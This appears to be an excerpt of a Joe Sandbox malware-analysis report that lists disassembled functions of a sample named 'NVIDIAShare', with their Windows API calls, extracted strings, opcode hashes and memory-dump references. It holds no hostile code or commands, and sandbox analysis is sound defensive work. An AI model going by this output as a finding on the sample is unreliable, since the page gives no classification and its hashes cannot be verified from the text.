Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a80ef402ff4950a71dba13457ceaa2be071315d8b5682f293dee39f5eba645
Instruction ID: 287d4bb29ec43ab5b54c119976bc638c3fb83d547fa010fd75acc0070a46dedc
Opcode Fuzzy Hash: 60a80ef402ff4950a71dba13457ceaa2be071315d8b5682f293dee39f5eba645
Instruction Fuzzy Hash: C851C4315093964FE723CF28C5844EEBFE0AE9A614F490999F4D95B283C221D68ADB52

Function 010100B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
Instruction ID: 304fd4cdbcefe9943b6cee2b0913a5a491fa50279448c3f6362cff1b06abbfaf
Opcode Fuzzy Hash: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
Instruction Fuzzy Hash: BB51DEB1A087159FC748CF19D48055AF7E1FB88324F058A2EF899E3340D735E999CB9A

Function 01013E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: b87aa642bf52f93208661ed39b590bc995cefb1abea06ad5cf7fd95ba50059f3
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 2831E4B17147468FDB55DF28C8502AABBE0FB95314F44452DE4C5DB341CB38E90ACB91

Function 0100E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0100E30E

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01041030,00000200,0100D928,00000000,?,00000050,01041030), ref: 01011DC4

_strlen.LIBCMT ref: 0100E32F
SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
GetWindowRect.USER32(?,?), ref: 0100E3C9
GetClientRect.USER32(?,?), ref: 0100E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0100E475
GetWindowRect.USER32(?,?), ref: 0100E4A2
SetWindowTextW.USER32(?,?), ref: 0100E4DB
GetSystemMetrics.USER32(00000008), ref: 0100E4E3
GetWindow.USER32(?,00000005), ref: 0100E4EE
GetWindowRect.USER32(00000000,?), ref: 0100E51B
GetWindow.USER32(00000000,00000002), ref: 0100E58D

Strings

d, xrefs: 0100E3F5
CAPTION, xrefs: 0100E4BD
$%s:, xrefs: 0100E302

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 5e9b1f5948d5ede331eca1620290bc120bc7f421ca398b697d1f1cd94713650f
Instruction ID: 77572dba87375e63bc7a4dfe3971a20d318bad5496172d233b9976a4215ce5b3
Opcode Fuzzy Hash: 5e9b1f5948d5ede331eca1620290bc120bc7f421ca398b697d1f1cd94713650f
Instruction Fuzzy Hash: C8819371504301AFE711DFA8CD88A6BBBE9FBC8714F04491DFAC4AB291D675E8058B52

Function 0102CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0102CB66

Part of subcall function 0102C701: _free.LIBCMT ref: 0102C71E
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C730
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C742
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C754
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C766
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C778
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C78A
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C79C
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7AE
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7C0
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7D2
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7E4
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7F6

_free.LIBCMT ref: 0102CB5B

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 0102CB7D
_free.LIBCMT ref: 0102CB92
_free.LIBCMT ref: 0102CB9D
_free.LIBCMT ref: 0102CBBF
_free.LIBCMT ref: 0102CBD2
_free.LIBCMT ref: 0102CBE0
_free.LIBCMT ref: 0102CBEB
_free.LIBCMT ref: 0102CC23
_free.LIBCMT ref: 0102CC2A
_free.LIBCMT ref: 0102CC47
_free.LIBCMT ref: 0102CC5F

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
Instruction ID: 92a1fe252f5fb22641233d3ea0ec513d1b79043f541a32e0cbcd75d5f46099e7
Opcode Fuzzy Hash: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
Instruction Fuzzy Hash: F7315C316003269FFB62AA3DDA44B9A77E9AF10210F2088AAE5C8D7161DF31E844DB10

Function 01019711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01019736
_wcslen.LIBCMT ref: 010197D6
GlobalAlloc.KERNEL32(00000040,?), ref: 010197E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 01019806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0101982D

Strings

<html>, xrefs: 01019755, 0101978E
</html>, xrefs: 010197B7
utf-8"></head>, xrefs: 0101976B
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 01019760

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: e0efe7301e4b73f9d288078a90531bf66969b580ce9f42389b7ff44089e771e0
Instruction ID: 1e808a2ef87b8351e980c866ebd2a9022a9b0e351365c36056730496eca19ff7
Opcode Fuzzy Hash: e0efe7301e4b73f9d288078a90531bf66969b580ce9f42389b7ff44089e771e0
Instruction Fuzzy Hash: 4B316A32504312BAE725AF349C45FAF7B9CEFA5314F14011DF9C19A1C5EB6CD90983A6

Function 0101D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0101D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0101D6ED

Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0101D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0101D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0101D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0101D75D
DeleteObject.GDI32(00000000), ref: 0101D764
GetWindow.USER32(00000000,00000002), ref: 0101D76D

Strings

STATIC, xrefs: 0101D6F3

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
Instruction ID: 25dfd916c8ba7c0ab13d058deccb356f20d20d70cb3819897a4b6106aaf2844e
Opcode Fuzzy Hash: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
Instruction Fuzzy Hash: B8112432601791BBF2316AB49C4DFAF7AACBF54711F004510FAC5AA09DEB6DCA0947E4

Function 010296F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01029705

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 01029711
_free.LIBCMT ref: 0102971C
_free.LIBCMT ref: 01029727
_free.LIBCMT ref: 01029732
_free.LIBCMT ref: 0102973D
_free.LIBCMT ref: 01029748
_free.LIBCMT ref: 01029753
_free.LIBCMT ref: 0102975E
_free.LIBCMT ref: 0102976C

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
Instruction ID: a807f113391efa2cf6189ab72bf95ccdf6b102d967594a14376634fc56722bdd
Opcode Fuzzy Hash: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
Instruction Fuzzy Hash: 5111B67A51012ABFDB01FF54C840CDD3BB5EF24250B5199A2FA488F231DA32DA54DB84

Function 01022E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 01022F50
___TypeMatch.LIBVCRUNTIME ref: 0102305E
_UnwindNestedFrames.LIBCMT ref: 010231B0
CallUnexpected.LIBVCRUNTIME ref: 010231CB
_abort.LIBCMT ref: 010231D0

Strings

csm, xrefs: 01022E6E
csm, xrefs: 01022F87
csm, xrefs: 01022EDB

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
Instruction ID: 3009a68ba0c10372f4f5e81e888928a06bdf6dfffadf82987a72d16c11bf00eb
Opcode Fuzzy Hash: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
Instruction Fuzzy Hash: 12B19F3180022ADFCF65DFA8C8809AEBBB5FF18310F1441A9E9816F216D739DA51CF91

Function 01006FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01006FAA
_wcslen.LIBCMT ref: 01007013
_wcslen.LIBCMT ref: 01007084

Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00

Strings

UNC\, xrefs: 01007051
SeCreateSymbolicLinkPrivilege, xrefs: 01006FCC
SeRestorePrivilege, xrefs: 01006FC2
\??\, xrefs: 0100702B

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 213f1ec5c353957f1e24182f162d206d5cf168ed8176241598e85ff1c26ad575
Instruction ID: ca10db17fc503464c14c077f19f12ba8a28207a9924c6d18ed898d4d9aa9e784
Opcode Fuzzy Hash: 213f1ec5c353957f1e24182f162d206d5cf168ed8176241598e85ff1c26ad575
Instruction Fuzzy Hash: 7B41C0B1E04745AAFB22E7789C81FEE77ACAF54300F004495FAC5A71C1D679B6888660

Function 0101B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0101B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0101B650
SetWindowTextW.USER32(?,?), ref: 0101B661
GetDlgItem.USER32(?,00000065), ref: 0101B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0101B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0101B694

Strings

LICENSEDLG, xrefs: 0101B5D4

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 8548c82282c6687606edc22c343d363b41ca74d2928992214359066839cee201
Instruction ID: 34be27a9a6e3a3ee10a83ec1f57ab02219d233977af3c547384fd8adb991aca8
Opcode Fuzzy Hash: 8548c82282c6687606edc22c343d363b41ca74d2928992214359066839cee201
Instruction Fuzzy Hash: 7521B431604205BBE3316A69ED49F7B3FBCFB5AB45F010414FAC499098CB6FA8019771

Function 0101FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,423F441F,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE14
SysAllocString.OLEAUT32(00000000), ref: 0101FE1F
_com_issue_error.COMSUPP ref: 0101FE48
_com_issue_error.COMSUPP ref: 0101FE52
GetLastError.KERNEL32(80070057,423F441F,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE57
_com_issue_error.COMSUPP ref: 0101FE6A
GetLastError.KERNEL32(00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE80
_com_issue_error.COMSUPP ref: 0101FE93

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: fc9adad3dd5cad7c93487d85bdc7041872b68f4c853c29dd5006a78a51973ceb
Instruction ID: bf140e08184431db7b974a15e5e8e20b8ca89c14d803a2490dde74f185a75901
Opcode Fuzzy Hash: fc9adad3dd5cad7c93487d85bdc7041872b68f4c853c29dd5006a78a51973ceb
Instruction Fuzzy Hash: 3A411B71A00217ABDB10DF68C844BEFBBE9FB48B10F104269F995EB284D73D9504C7A0

Function 0100AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0100AF29

Strings

ROOT\CIMV2, xrefs: 0100AF5C
SELECT * FROM Win32_OperatingSystem, xrefs: 0100AFCA
Name, xrefs: 0100B0B0
WQL, xrefs: 0100AFDC
Windows 10, xrefs: 0100B0C2

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
Instruction ID: 7207fa42f4e8cad32a68352760d62e6085b9f82051d3e727763a4dab0f4027f9
Opcode Fuzzy Hash: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
Instruction Fuzzy Hash: 5F717F74B00219EFEB25DFA5C8959AEBBB9FF88710F04015DE596AB290CB356D01CB50

Function 01009382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01009387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 010093AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 010093C9

Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2

Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1

_swprintf.LIBCMT ref: 01009465

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

MoveFileW.KERNEL32(?,?), ref: 010094D4
MoveFileW.KERNEL32(?,?), ref: 01009514

Strings

rtmp%d, xrefs: 0100944E

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 6089b2336391db8c68cac2eb6113e2b63ec04640b8ec5e58ef23cd54113f1bd4
Instruction ID: 6c871d4ed023099e9c59116efca6dfc5708b24ac7b699d2667ab094f29e3e869
Opcode Fuzzy Hash: 6089b2336391db8c68cac2eb6113e2b63ec04640b8ec5e58ef23cd54113f1bd4
